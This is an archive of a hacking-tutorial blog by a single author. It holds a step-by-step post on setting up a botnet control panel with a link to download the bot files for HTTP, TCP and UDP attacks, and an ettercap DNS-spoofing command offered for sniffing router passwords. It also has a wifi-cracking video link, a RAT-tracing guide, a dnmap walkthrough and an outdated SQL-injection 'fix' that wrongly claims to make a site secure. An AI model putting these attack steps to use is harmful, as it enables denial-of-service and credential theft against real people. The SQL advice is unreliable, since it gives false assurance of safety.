Showing posts with label security. Show all posts
Showing posts with label security. Show all posts

Monday, 15 September 2014

How to fix Imap.gmail.com error ? by vikas batta


1. open your gmail and open the Account setting like this




2. Now click on security option



3. Now open the settings 



4. Again put the password if it is ask


5. Now open the app specific password and open the Manage app specific password


6. Now select your device and click on generate like this


7. In the next window you can see the app password , this password copy from here and put into the mail client


Friday, 27 June 2014

Making Your Own Botnet By Vikas Batta

A botnet is a group of computers connected in a coordinated fashion for malicious purposes. Each computer in a botnet is called a bot. These bots form a network of compromised computers, which is controlled by a third party and used to transmit malware or spam, or to launch attacks.

A botnet may also be known as a zombie army.
Originally, botnets were created as a tool with valid purposes in Internet relay chat (IRC) channels. Eventually, hackers exploited the vulnerabilities in IRC networks and developed bots to perform malicious activities such as password theft, keystroke logging, etc.

An attacker will often target computers not safeguarded with firewalls and/or anti-virus software. A botnet manipulator can get control of a computer in a variety of ways, but most frequently does so via viruses or worms. Botnets are significant because they have become tools that both hackers and organized crime use to perform illegal activities online. For example, hackers use botnets to launch coordinated denial-of-service attacks, while organized crime uses botnets as ways to spam, or send a phishing attack that is then used for identify theft. 

Even more concerning is the industry that has sprung up around botnets in which bot herders build botnets specifically to "rent" to the highest bidder. Whether they send spam, adware/spyware, viruses/worms, etc., botnets can be used to perpetrate just about any type of digital attack.

Step 1  :-
              Open the C-panel  of your hosting





Step 2  :-
                Now open the MySQL to create a database

 
Step 3  :-
               After createing the database now open the the PHP MY ADMIN and IMPORT the SQL file.





Step 4  :-
             Now open the FILE MANAGER


Step 5  :-
             Here Upload the file in the PUBLIC.HTML directory
             file's are
           
                              and upload in public.html directory


Step 6  :-
             Now insatll your bot online
             like www.example.com.install/install.php



Step 7  :-
            After the insatllation of bot now Open it with your USER NAME or PASSWORD


Step 8  :-
             After the login you entered in your bot


Step 9  :-
             Now open the REd tube.exe and put the url of your site


Step 10  :-
               Now you can attck  on HTTP site, TCP and UDP services



You can Downlaod all related file from here

https://www.sendspace.com/file/otrwqv

THANKS

Sunday, 4 May 2014

How to trace a RAT from your computer by VIKAS BATTA

TRACE A RATTER

Requirements:-

1:- Wireshark.
2:- processhacker.
3:- SandboxieInstall

To trace a RATTER first of all we need that if we have potential RAT server in our system. Don’t  open it directly by double click install Sandboxie in your pc and open the RAT Trojan file with Sandboxie. It will appear as different service in the Processhacker.





Here we have the RAT server we have to open it with the Sandboxie. To explore its process in the processHacker



Now it will appear as a separate process in the process explorer now we have to trace that process. Keep it in running till the tracing process is running on the wireshark.



Start the capturing of the packets through which your RAT server is responding to its dedicated host address over the web.



While it capturing the packets we have to filter the packets related with the DNS protocol from the all transactions where we will get the Temporary DNS Host Address location and the IP Address of the server to which the RAT installed on our server is responding.


here we have the IP and DNS Name of the Hosting at NO-IP.COM.



Now keep the record of the IP Address and the Host Address of the RAT by copying the records from the transactions





Now we have all the tracks which need to report the website which is being used by the RAT poisoner for spreading of the malicious file over the internet. Now we can directly report to the website with the appropriate snapshots which resembling with the records of the website.

       To report to the website just browse to the official webpage of the website and follow the following steps.
       Browse for the support page.

2      Go to ABUSE@NO-IP.COM.

      Submit all the proofed links or snapshots regarding your complain.
      Tell them what harm you got because the services of their website.
      Trace the attacker with the help of that websites Logs (further procedure with the help of website.)


happy Ending





Friday, 2 May 2014

How to sniff Wifi router's password by vikas batta

Sniff wifi router password




First UPDATE the ALL package wtih 'APT-GET UPDATE'

Now  to locate DNS file with 'LOCATE ETTER.DNS' COMMAND

Now type 'DIG' command to get ROUTER gateway ip

Open 'ETTER.DNS' file with vim editer

Now edit this file with redrection on  other sites like google.com & facebook.com



Now finally start sniffing and redirecting with ' ettercap -Tqi etho -P dns_spoof -M // // '

Finally you got the user name and password of the Router



HAPPY ENDING



Monday, 24 February 2014

How we can crack wifi password by vikas batta

Watch this video
                             With this video you can easily crack wifi

                              https://www.youtube.com/watch?v=zlDhUiDIG34

Tuesday, 14 January 2014

How to protect your web site from SQL injection (string based) BY VIKAS BATTA


STEP 1 :-

        You have a c-pannel access like this


STEP 2 :-
    
               Now open the FILE MANAGER

STEP 3 :-
     
       Now select the public.html directory  

STEP 4 :-

       Here you Select the config.php file

STEP 5 :-

     Now edit the config file with 4 lines
       // To protect MySQL injection
           $myusername = stripslashes($myusername);
           $mypassword = stripslashes($mypassword);
           $myusername = mysql_real_escape_string($myusername);
           $mypassword = mysql_real_escape_string($mypassword);


STEP 6 :-
1               Now save the file
  


             Congratulation now your web site is secure from SQL attack
      

Monday, 11 November 2013

DNMAP ON KALI LINUX BY VIKAS BATTA




INTRODUCTION 
  • Dnmap is a framework which follows a client/server architecture.
  • The server issues nmap commands to the clients and the clients execute it.
  •  In this way, the load of performing such a large scan is distributed among the clients. 
  • The commands that the server gives to its clients are put in a command file. 
  • The results are stored in a log file which are saved on both the server and the client.
FEATURES OF DNMAP SERVER 
  1. If the server gets down, clients continue trying to connect until the server gets back online.
  2. If the server gets down, when you put it up again it will send commands starting from the last command given before the shutdown. You do not need to remember where it was.
  3. You can add new commands to the original file without having to stop the server. The server will read them automatically.
  4. If some client goes down, the server will remember which command it was executing and it will re-schedule it for later.
  5. It will store every detail of the operations in a log file.
  6. It shows real time statistics about the operation of each client, including:
  •  Number of commands executed
  •  Last time seen
  •  Uptime
  •  Version of the client
  •  If the client is being run as root or not.
  •  It calculates the amount of commands executed per minute
  •  The historic average of the amount of commands executed per minute
  •  The status of the client (Online, Offline, Executing or Storing)
  •  You can choose which port to use. Defaults to 46001
Only the Online clients are shown in the running stats



FEATURES OF DNMAP CLIENT 
  • If the server gets down, it keeps connecting to it until it gets up again.
  • Strip strange characters from the command sent by the server. Tries to avoid command injection vulns.
  • It only executes the nmap command. It deletes the command send by the server and changes it by the known and trusted nmap binary on the system.
  • You can select an alias for your user.
  • You can change which port the client connects to.
  • If the command sent by the server does not have a -oA option, the client add it anyway to the command, so it will always have a local copy of the output.
  • If the server sends a min-rate parameter, it is striped out.
  • You can control the nmap scanning rate regarthless of servers sent parameters.
  • Tell the server if you are root or not, so it can change the nmap commands accordingly.
CREATE TEXT FILE 
  • To create text file use this vim editor .
  • Command syntax : vim <file name >
  • Command used : vim commands.txt 
Once you press enter , it will open your file in vim editor 

ENTER NMAP COMMANDS ON COMMAND FILE 

  • In this example , i simply enter two nmap commands . 
  • See the below image for more details 





NOW OPEN DNMAP_SERVER 


  • To open Dnmap_server goto > Applications > Kali Linux > Information Gathering > Network Scanners >dnmap-server
  • See the below image for more help -

DNMAP SERVER OPENED


RUNNING DNMAP_SERVER 


  • To run dnmap_server use the command as shown below -
  • Command Used : /usr/bin/dnmap_server -f commands.txt
  • See the below image for more details -


OPEN DNS_CLIENT 


  • To open Dnmap_client goto Kali Linux > Information Gathering > Network Scanners >dnmap-client .
  • See the below image for more details –



RUNNING DNMAP CLIENT 



  • To run dnmap_client , use the following command .
  • Command syntax : /usr/bin/dnmap_client -s <server-ip>
  • Example :  /usr/bin/dnmap_client -s 192.168.72.132
Note : Here server ip is your Kali linux ip address


DNMAP_SERVER RESPONSE 


  • Now you can see that clients are connected and response are showing on the dnmap_server .
  • See the below image for more details -


DNMAP OUTPUT 


  • So here is your output files inside the nmap_output folder which is automatically created 
  • See the below image for more details -  


·         ·  This is how we can use this network scanner tool . 
·         ·  Soon more examples will be uploaded soon.